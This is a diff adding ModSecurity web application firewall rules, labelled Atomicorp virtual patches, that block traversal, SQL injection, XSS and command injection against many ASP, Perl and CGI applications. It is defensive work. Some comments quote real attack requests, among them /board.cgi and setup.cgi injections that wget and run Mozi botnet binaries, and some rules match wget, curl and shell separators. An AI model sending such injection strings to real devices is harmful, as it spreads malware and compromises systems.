+SecRule ARGS|!ARGS:/wp_autosave/|!ARGS:subject|!ARGS:/msg/|!ARGS:/messages/|!ARGS:/chg_file/|!ARGS:/aiowps/ "^/?[a-z0-9\./]{0,}wp-config\.php"  "phase:2,chain,capture,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336461,rev:8,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible attempt to maliciously access wp-config.php file',logdata:'%{TX.0}'"
+SecRule REQUEST_METHOD "(?:POST|GET)" "t:none"
+
+SecMarker END_RULE_336461
+
+SecRule REQUEST_URI_RAW "^\w+:/"         "chain,phase:2,deny,log,auditlog,status:403,t:none,id:314293,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Proxy Probe'"
+SecRule REQUEST_URI "/(?:(?:proxyheader|proxy-?1?|proxy/judge)\.php|fastenv|proxy(?:judge|proxy))" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#ECP proxy
+SecRule REQUEST_FILENAME "@endswith .ecp"         "id:330883,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:330884,t:none,pass,nolog,noauditlog,skipAfter:END_ECP_JITP"
+SecMarker END_ECP_JITP
+
+#ASP applications
+SecRule REQUEST_FILENAME "@endswith .(?:aspx?|svc)"         "id:313873,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313874,t:none,pass,nolog,noauditlog,skipAfter:END_ASL_JITP"
+
+#CMD=Set-OabVirtualDirectory
+SecRule ARGS|REQUEST_COOKIES "set-oabvirtualdirectory"         "id:317092,rev:12,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Exchange server zero day blocked'"
+
+SecRule REQUEST_URI "/search\.aspx"         "id:317091,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: search XSS attempt',chain"
+SecRule ARGS "^><"
+
+
+# Rule 310091:  Crystal Reports crystalImageHandler.aspx directory
+#	traversal attempt
+SecRule REQUEST_URI "/crystalimagehandler\.aspx"         "id:310091,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Crystal Reports crystalImageHandler.aspx directory traversal attempt',chain"
+SecRule ARGS:dynamicimage "\.\./"
+
+
+# Rule 310210:  philboard_admin.asp authentication bypass attempt
+SecRule REQUEST_URI  "/philboard_admin\.asp"         "id:310210,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  philboard_admin.asp authentication bypass attempt',chain"
+SecRule ARGS:philboard_admin "true"
+
+
+# Rule 310296: ACS Blog search.ASP Cross-Site Scripting Vulnerability
+SecRule REQUEST_URI "/search\.asp"         "chain,id:310296,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ACS Blog search.asp cross-site-scripting attempt'"
+SecRule ARGS:search "(?:(?:javascript|script|about|applet|activex|chrome)*\>|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)\:/\\:/)"
+
+
+# Rule 310300: OWA phishing redirect
+SecRule REQUEST_URI "/exchweb/bin/auth/owalogon\.asp"         "chain,id:310300,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Outlook Web Access owalogon.asp phishing redirect attempt'"
+SecRule ARGS:url "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310367:PortalApp SQL injection and XSS
+SecRule REQUEST_URI "/ad_click\.asp"         "chain,id:310367,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PortalAPP ad_click.asp SQL injection attempt'"
+SecRule ARGS:banner_id "'"
+
+
+# Rule 310368:PortalApp SQL injection and XSS
+SecRule REQUEST_URI "/content\.asp"         "chain,id:310368,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PortalAPP content.asp SQL injection attempt'"
+SecRule ARGS:catid|ARGS:contentid "'"
+
+
+# Rule 310370:PortalApp SQL injection and XSS
+SecRule REQUEST_URI "/content\.asp"         "chain,id:310370,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PortalAPP content.asp cross-site-scripting attempt'"
+SecRule ARGS:contenttype|ARGS:do_search "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310475:SQL Injections in MetaBid auctions
+SecRule REQUEST_URI "/item\.asp"         "chain,id:310475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MetaBid item.asp SQL injection attempt'"
+SecRule ARGS:intauctionid "'"
+
+#RedDot CMS SQL injection vulnerability
+SecRule REQUEST_URI "iord\.asp" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390180,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RedDot CMS SQL injection vulnerability'"
+SecRule ARGS:action "(?:io_dgc_eng|xtype=char|sysobjects|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+#links.asp Catid injection
+SecRule REQUEST_URI "/links\.asp" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:390196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: links.asp SQL injection vulnerability'"
+SecRule ARGS:catid  "(?:password|user_name|accesslevel)"
+
+SecMarker END_ASL_JITP
+
+#PERL applications
+SecRule REQUEST_FILENAME "@endswith .pl"         "id:333874,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309008,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_JITP"
+
+
+# Rule 310000:  formmail
+SecRule REQUEST_URI "/(?:formmail|mailform)(?:\x0a|\.pl\x0a)"          "id:310000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: web-cgi formmail'"
+
+
+# Rule 310051:  *%0a.pl access
+SecRule REQUEST_URI "/*\x0a\.pl"          "id:310051,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: a.pl access'"
+
+
+# Rule 310089:awstats probe
+SecRule REQUEST_URI  "^/awstats\.pl$" 	"id:310089,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Awstats.pl probe'"
+
+
+# Rule 310093:ftp.pl attempt
+SecRule REQUEST_URI "/ftp\.pl\?dir=\.\./\.\."         "id:310093,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ftp.pl directory traversal attempt'"
+
+
+# Rule 310100:  anaconda directory transversal attempt
+SecRule REQUEST_URI "/(?:apexec|anacondaclip)\.pl"         "id:310100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: anaconda directory transversal attempt', chain"
+SecRule REQUEST_URI "template=\.\./"
+
+
+# Rule 310104:  rwwwshell.pl access
+SecRule REQUEST_URI "/rwwwshell\.pl"         "id:310104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: rwwwshell.pl access'"
+
+
+# Rule 310106:  calendar_admin.pl arbitrary command execution attempt
+SecRule REQUEST_URI "/calendar_admin.pl\?config=\|7c\|"         "id:310106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: calendar_admin.pl arbitrary command execution attempt'"
+
+
+# Rule 310111:  Amaya templates sendtemp.pl directory traversal attempt
+SecRule REQUEST_URI "/sendtemp\.pl"         "id:310111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Amaya templates sendtemp.pl directory traversal attempt',chain"
+SecRule REQUEST_URI "templ="
+
+
+# Rule 310114:  cgiforum.pl attempt
+SecRule REQUEST_URI "/cgiforum\.pl\?thesection=\.\./\.\."         "id:310114,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cgiforum.pl attempt'"
+
+
+# Rule 310117:  cal_make.pl directory traversal attempt
+SecRule REQUEST_URI "/cal_make\.pl"         "id:310117,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cal_make.pl directory traversal attempt',chain"
+SecRule REQUEST_URI "p0=\.\./\.\./"
+
+
+# Rule 310119:  ustorekeeper.pl directory traversal attempt
+SecRule REQUEST_URI "/ustorekeeper\.pl"         "id:310119,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ustorekeeper.pl directory traversal attempt',chain"
+SecRule REQUEST_URI "file=\.\./\.\./"
+
+
+# Rule 310121:  alibaba.pl arbitrary command execution attempt
+SecRule REQUEST_URI "/alibaba\.pl(?:\|7c\||\x7c)"         "id:310121,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alibaba.pl arbitrary command execution attempt'"
+
+
+# Rule 310128:  eshop.pl arbitrary command execution attempt
+SecRule REQUEST_URI "/eshop\.pl\?seite=(?:\|3b\|\x3b)"         "id:310128,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  eshop.pl arbitrary command execution attempt'"
+
+
+# Rule 310147:  story.pl arbitrary file read attempt
+SecRule REQUEST_URI "/story\.pl"         "id:310147,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  story.pl file access attempt',chain"
+SecRule REQUEST_URI "next=\.\./"
+
+
+# Rule 310181:  ftp.pl attempt
+SecRule REQUEST_URI "/ftp\.pl\?dir=\.\./\.\."         "id:310181,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Talentsoft Web+ source code access attempt'"
+
+
+# Rule 310204:  roads search.pl attempt
+SecRule REQUEST_URI "/roads/cgi-bin/search\.pl"         "id:310204,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  roads search.pl access attempt',chain"
+SecRule REQUEST_URI "form="
+
+
+# Rule 310208:  ans.pl attempt
+SecRule REQUEST_URI "/ans.pl\?p=\.\./\.\./"         "id:310208,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  ans.pl file access attempt'"
+
+
+# Rule 310254: awstats - local command execution
+SecRule REQUEST_URI  "/awstats\.pl\?"         "chain,id:310254,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl command execution attempt'"
+SecRule ARGS:configdir|ARGS:update|ARGS:pluginmode|ARGS:cgi|ARGS:migrate "(?:\||echo|\:system\(|uname)"
+
+
+# Rule 310255: awstats - local file alteration
+SecRule REQUEST_URI  "/awstats\.pl\?(?:debug=1|pluginmode=rawlog\&loadplugin=rawlog|update=1\&logfile=\|)"         "id:310255,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl local file access attempt'"
+
+
+# Rule 310256: awstats vulns
+SecRule REQUEST_URI  "/awstats\.pl\?[^\r\n]*logfile=\|"         "id:310256,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl local file access attempt'"
+
+
+# Rule 310257: awstats vulns
+SecRule REQUEST_URI  "/awstats\.pl\?configdir="         "id:310257,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl directory traversal attempt'"
+
+
+# Rule 310259: awstats vulns
+SecRule REQUEST_URI  "awstats\.pl\?"         "chain,id:310259,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats local file system access monkey business attempt'"
+SecRule ARGS "(?:debug|configdir|perl|chmod|exec|print|cgi)" 
+
+# Rule 310260: yabb
+#SecRule REQUEST_URI "/yabb\.pl\?action=usersrecentposts\;username=\<iframe.*javascript\:alert\(\'" #        "id:310260,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaBB.pl Javascript injection attempt'"
+
+
+# Rule 310380:E-Data 2.0 XSS
+#SecRule REQUEST_URI "cgi-bin/dir\.pl.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310380,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: E-Data dir.pl cross-site-scripting attempt'"
+
+
+# Rule 310434: CalendarScript path discolsure and XSS
+#SecRule REQUEST_URI "/calendar\.pl\?calendar=.*&template=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310434,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CalendarScript calendar.pl cross-site-scripting attempt'"
+
+
+# Rule 310435: CalendarScript path discolsure and XSS
+#SecRule REQUEST_URI "/calendar\.pl\?calendar=.*&command=login&username=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #        "id:310435,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CalendarScript calendar.pl cross-site-scripting attempt'"
+
+
+# Rule 310019: formmail probe
+SecRule REQUEST_URI|REQUEST_BODY "^/formmail\.pl$"         "id:310498,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Formmail probe'"
+
+
+# Rule 310019: quizz.pl exploit
+SecRule REQUEST_URI "quizz\.pl/ask/\;" "id:390043,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: quizz.pl exploit'"
+
+
+SecMarker END_PERL_JITP
+
+#.form
+SecRule REQUEST_FILENAME "\.form$"         "id:332875,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309209,t:none,pass,nolog,noauditlog,skipAfter:END_FORM_JITP"
+
+SecRule REQUEST_URI "saveserializeddefinition\.form"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:391653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible OpenMRS Remote code injection '"
+SecRule ARGS:serializedData "(?:<|>)" "t:none,t:urlDecodeUni"
+
+SecMarker END_FORM_JITP
+
+#CGI applications
+SecRule REQUEST_URI "cgi-bin/"         "id:330877,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:307020,t:none,pass,nolog,noauditlog,skipAfter:END_CGI_2_JITP"
+
+SecRule REQUEST_URI "/kerbynet"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312657,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: kerbynet command injection blocked'"
+SecRule ARGS:type "(?:\*|\;)"  "t:none,t:urlDecodeUni"
+
+
+SecMarker END_CGI_2_JITP
+
+#CGI applications
+SecRule REQUEST_FILENAME "(?:\.cgi|cgi-|fcgi)$"         "id:333875,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309009,t:none,pass,nolog,noauditlog,skipAfter:END_CGI_JITP"
+
+#/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://901.298.356.456:42575/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
+SecRule REQUEST_URI "/board\.cgi"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312608,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: board.cgi command injection blocked'"
+SecRule ARGS:cmd "(?:cd|wget|curl)"  "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://wheverver/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
+SecRule REQUEST_URI "/setup\.cgi"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312668,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: setup.cgi command injection blocked'"
+SecRule ARGS:todo "syscmd"  "chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:cmd "\;"  "t:none,t:urlDecodeUni"
+
+
+SecRule REQUEST_URI "/tmunblock\.cgi"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cisco tmunblock.cgi command injection blocked'"
+SecRule ARGS:ttcp_ip "\`"  "t:none,t:urlDecodeUni"
+
+SecRule REQUEST_URI "/weblogin\.cgi"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312659,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: weblogin.cgi command injection blocked'"
+SecRule ARGS:username|ARGS:password "\'"  "t:none,t:urlDecodeUni"
+
+#wget "http://www.atomicorp.com//builder/login.php?shopname=&action=lostpw&email=&redirect=%20;%20x%20%7C%7C%20sleep%203%20%26"
+#http://www.atomicorp.com//builder/login.php?shopname=&action=lostpw&email=&redirect= ;%2�� || sleep 3 &
+#TODO
+SecRule ARGS "\;.{1,8} \|\| " "phase:2,log,deny,status:403,auditlog,t:none,t:utf8toUnicode,t:urlDecodeUni,t:compressWhiteSpace,id:392658,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CGI command injection blocked'"
+
+
+#login.cgi?cli=aa aa';wget
+SecRule REQUEST_URI "/login\.f?cgi"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:392657,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: login.cgi command injection blocked'"
+SecRule ARGS:cli "'" 
+
+#commerce.cgi XSS vulnerability
+SecRule REQUEST_URI "/commerce\.f?cgi"  "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible XSS injection in ecommerce CGI'"
+SecRule ARGS:page|ARGS:/com_/ "(?:<|>|script)" 
+
+
+
+# Rule 310001: pals-cgi arbitrary file access attempt
+SecRule REQUEST_URI "/pals-cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pals-cgi arbitary file access attempt'"
+SecRule REQUEST_URI "documentname=" 
+
+
+# Rule 310005:   cssearch.cgi arbitrary command execution attempt
+SecRule REQUEST_URI "/cssearch\.f?cgi\?"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cssearch.cgi arbitrary command execution attempt',chain"
+SecRule REQUEST_URI "('|`)"
+
+
+# Rule 310006:   FormHandler.cgi directory traversal attempt attempt
+SecRule REQUEST_URI "/formhandler\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FormHandler.cgi directory traversal attempt attempt',chain"
+SecRule REQUEST_URI "/\.\./"
+
+
+# Rule 310007:  FormHandler.cgi external site redirection attempt
+SecRule REQUEST_URI "/formhandler\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310007,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FormHandler.cgi external site redirection attempt',chain"
+SecRule ARGS:redirect "http"
+
+
+# Rule 310017:  dcforum.cgi directory traversal attempt
+SecRule REQUEST_URI "/dcforum\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310017,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: dcforum.cgi directory traversal attempt',chain"
+SecRule ARGS:forum "\.\./\.\."
+
+
+# Rule 310018:  dcboard.cgi invalid user addition attempt
+#SecRule REQUEST_URI "/dcboard\.f?cgi.*\|admin" #        "id:310018,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: dcboard.cgi invalid user addition attempt'"
+
+
+# Rule 310024:  Home Free search.cgi directory traversal attempt
+SecRule REQUEST_URI "/search\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310024,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Home Free search.cgi directory traversal attempt',chain"
+SecRule ARGS:letter "\.\./\.\."
+
+
+# Rule 310026:  pfdispaly.cgi arbitrary command execution attempt
+SecRule REQUEST_URI "/pfdispaly\.f?cgi\?\'"          "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pfdispaly.cgi arbitrary command execution attempt'"
+
+
+# Rule 310027:  talkback.cgi directory traversal attempt
+SecRule REQUEST_URI "/talkbalk\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: talkback.cgi directory traversal attempt',chain"
+SecRule ARGS:article "\.\./\.\./"
+
+
+# Rule 310028:  technote main.cgi file directory traversal attempt
+SecRule REQUEST_URI "/technote/main\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: technote main.cgi file directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./\.\./"
+
+
+# Rule 310029:  technote print.cgi directory traversal attempt
+SecRule REQUEST_URI "/technote/print\.f?cgi"         "chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: technote print.cgi directory traversal attempt'"
+SecRule REQUEST_URI "\x00"
+
+
+# Rule 310030:  eXtropia webstore directory traversal
+SecRule REQUEST_URI "/web_store\.f?cgi"         "id:310030,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXtropia webstore directory traversal',chain"
+SecRule ARGS:page "\.\./"
+
+
+# Rule 310031:  shopping cart directory traversal
+SecRule REQUEST_URI "/shop\.f?cgi"         "id:310031,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: shopping cart directory traversal',chain"
+SecRule ARGS:page "\.\./"
+
+
+# Rule 310032:  Allaire Pro Web Shell attempt
+SecRule REQUEST_URI "/authenticate\.f?cgi\?password"         "id:310032,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Allaire Pro Web Shell attempt',chain"
+SecRule REQUEST_URI "config\.ini"
+
+
+# Rule 310033:  Armada Style Master Index directory traversal
+SecRule REQUEST_URI "/search\.f?cgi\?keys"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Armada Style Master Index directory traversal',chain"
+SecRule ARGS:catigory|ARGS:catgeory "\.\./"
+
+
+# Rule 310034:  cached_feed.cgi moreover shopping cart directory
+#	traversal
+SecRule REQUEST_URI "/cached_feed\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310034,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cached_feed.cgi moreover shopping cart directory traversal',chain"
+SecRule REQUEST_URI "\.\./"
+
+
+# Rule 310035:  Talentsoft Web+ exploit attempt
+SecRule REQUEST_URI "/webplus\.f?cgi\?Script=/webplus/webping/webping\.wml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Talentsoft Web+ exploit attempt'"
+
+
+# Rule 310036:  txt2html.cgi directory traversal attempt
+SecRule REQUEST_URI "/txt2html\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310036,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: txt2html.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./\.\./"
+
+
+# Rule 310037:  store.cgi directory traversal attempt
+SecRule REQUEST_URI "/store\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: store.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./"
+
+
+# Rule 310038:  mrtg.cgi directory traversal attempt
+SecRule REQUEST_URI "/mrtg\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310038,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mrtg.cgi directory traversal attempt',chain"
+SecRule ARGS:cfg "/\.\./"
+
+
+# Rule 310039:  CCBill whereami.cgi arbitrary command execution attempt
+SecRule REQUEST_URI "/whereami\.f?cgi\?g="          "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CCBill whereami.cgi arbitrary command execution attempt'"
+
+
+# Rule 310040:  WhatsUpGold instancename overflow attempt
+SecRule REQUEST_URI "/_maincfgret\.f?cgi"          "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310040,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WhatsUpGold instancename overflow attempt'"
+
+
+# Rule 310095:  HyperSeek hsx.cgi directory traversal attempt
+#SecRule REQUEST_URI "/hsx\.f?cgi.*(\x00a|\.\./\.\.)" #        "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310095,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: HyperSeek hsx.cgi directory traversal attempt'"
+
+
+# Rule 310096:  SWSoft ASPSeek Overflow attempt
+#SecRule REQUEST_URI "/s\.f?cgi.*tmp=" #        "id:310096,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SWSoft ASPSeek Overflow attempt'"
+
+
+# Rule 310109:  wayboard attempt
+SecRule REQUEST_URI "/way-board/way-board\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  wayboard attempt',chain"
+SecRule REQUEST_URI "\.\./\.\."
+
+
+# Rule 310110:  commerce.cgi arbitrary file access attempt
+SecRule REQUEST_URI "/commerce\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: commerce.cgi arbitrary file access attempt',chain"
+SecRule REQUEST_URI "/\.\./"
+
+
+# Rule 310112:  webspirs.cgi directory traversal attempt
+SecRule REQUEST_URI "/webspirs\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310112,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: webspirs.cgi directory traversal attempt',chain"
+SecRule REQUEST_URI "\.\./\.\./"
+
+
+# Rule 310113:  auktion.cgi directory traversal attempt
+SecRule REQUEST_URI "/auktion\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310113,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auktion.cgi directory traversal attempt',chain"
+SecRule ARGS:menue|ARGS:menu "\.\./\.\./"
+
+
+# Rule 310115:  directorypro.cgi attempt
+SecRule REQUEST_URI "/directorypro\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310115,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: directorypro.cgi attempt',chain"
+SecRule REQUEST_URI "\.\./\.\."
+
+
+# Rule 310116:  Web Shopper shopper.cgi attempt
+SecRule REQUEST_URI "/shopper\.f?cgi"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310116,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Web Shopper shopper.cgi attempt',chain"
+SecRule ARGS:newpage "\.\./"
+
+
+# Rule 310118:  ttawebtop.cgi arbitrary file attempt
